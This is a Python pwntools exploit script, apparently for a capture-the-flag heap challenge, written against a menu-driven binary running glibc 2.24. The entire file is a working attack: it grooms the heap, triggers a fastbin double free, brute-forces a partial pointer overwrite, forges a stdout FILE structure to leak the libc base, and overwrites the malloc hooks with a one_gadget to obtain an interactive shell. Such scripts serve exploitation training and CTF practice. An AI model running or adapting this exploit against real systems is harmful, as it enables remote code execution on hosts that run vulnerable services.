#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# expBy : @eastXueLian
# Debug : ./exp.py debug ./pwn -t -b b+0xabcd
# Remote: ./exp.py remote ./pwn ip:port
from lianpwn import *
from pwncli import *
# Per the usage lines in the header, argv selects debug/remote mode, the target
# binary and (for remote) ip:port; cli_script() consumes that and fills `gift`.
cli_script()
# libc build the remote target is assumed to run with; the fixed offsets used
# later in this script are only meaningful for this exact build.
set_remote_libc("/home/eastxuelian/config/glibc-all-in-one/libs/2.24-9ubuntu2.2_amd64/libc.so.6")
# Handles handed over by cli_script() via pwncli's `gift` container.
libc: ELF = gift.libc
elf: ELF = gift.elf
io: tube = gift.io
def cmd(choice):
    """Wait for the menu prompt, then send the integer *choice* (via i2b) as one line."""
    menu_prompt = b"[+]> "
    ru(menu_prompt)
    encoded = i2b(choice)
    sl(encoded)
def push(size, data):
    """Drive menu option 1: answer the size prompt with *size*, then send *data* raw.

    The size is answered through cmd() (so it waits for the "[+]> " prompt
    first); the data is sent with s(), i.e. without a trailing newline.
    """
    def answer(prompt, value):
        # Wait for *prompt*, then reply through the menu helper.
        ru(prompt)
        cmd(value)

    cmd(1)
    answer(b"How much?\n", size)
    ru(b"Data?\n")
    s(data)
def pop(idx):
    """Drive menu option 2: answer the "Which one?" prompt with the integer *idx*."""
    option = 2
    cmd(option)
    ru(b"Which one?\n")
    cmd(idx)
# Script body: a fixed sequence of menu interactions; statement order matters,
# every push/pop below is consumed by the target in this exact order.
# Create 16 entries of 0x6F bytes, each holding its own index byte repeated 8
# times, then remove all but the last in index order.
for i in range(0x10):
    push(0x6F, i2b(i) * 8)
for i in range(0x10 - 1):
    pop(i)
# Answer the menu prompt with an over-long line (0x400 bytes of '9').
# NOTE(review): how the target treats this oversized menu input is not visible here.
ru(b"[+]> ")
sl(b"9" * 0x400)
push(0x60, b"aaa")
push(0x60, b"bbb")
# A random 4-bit value is OR'd into bits 12-15 of the 16-bit payload below.
# The right value is not derivable from this script, so each run is a 1-in-15
# guess and the script is presumably re-run until it works — confirm.
luckybit = __import__("random").randint(1, 15)
push(0x60, p16(0x5BD | (luckybit << 12)))
# push(0x60, p16(0x1ACD))
pop(0x10)
pop(0x11)
pop(0x10)
push(0x60, p8(0xE0))
push(0x60, p8(0xE0))
push(0x60, p64(0xDEADBEEF))
push(0x60, p8(0xE0))
# Send a marker (0xFBAD1887 followed by three zero qwords), wait until the
# target echoes that same marker back, and take the next 8 bytes as an address.
# 0x3C2600, 0x3C1ACD and the `og` offsets are tied to the libc selected by
# set_remote_libc() above (2.24-9ubuntu2.2 amd64) and cannot be checked here.
push(0x66, b"\x00" * 0x33 + p64(0xFBAD1887) + p64(0) * 3 + p8(0))
ru(p64(0xFBAD1887) + p64(0) * 3)
libc_base = u64_ex(rn(8)) - 0x3C2600
lg("libc_base", libc_base)
# pwncli debug breakpoint; presumably a no-op when not run in debug mode — confirm.
debugB()
push(0x60, b"ccc")
push(0x60, b"ddd")
pop(0x18)
pop(0x19)
pop(0x18)
push(0x60, p64(libc_base + 0x3C1ACD))
push(0x60, p64(0xCAFECAFE))
push(0x60, p64(0xCAFECAFE))
# Three candidate libc-relative offsets; only og[2] is used below.
og = [0x4557A, 0xF1651, 0xF24CB]
push(
    0x60,
    b"\x00" * (0x13 - 8) + p64(libc_base + og[2]) + p64(libc_base + libc.sym.realloc),
)
# One more menu option 1: "?\n" matches the tail of the size prompt, 0x20 is
# sent as the size, then the session is handed over interactively.
cmd(1)
ru(b"?\n")
cmd(0x20)
ia()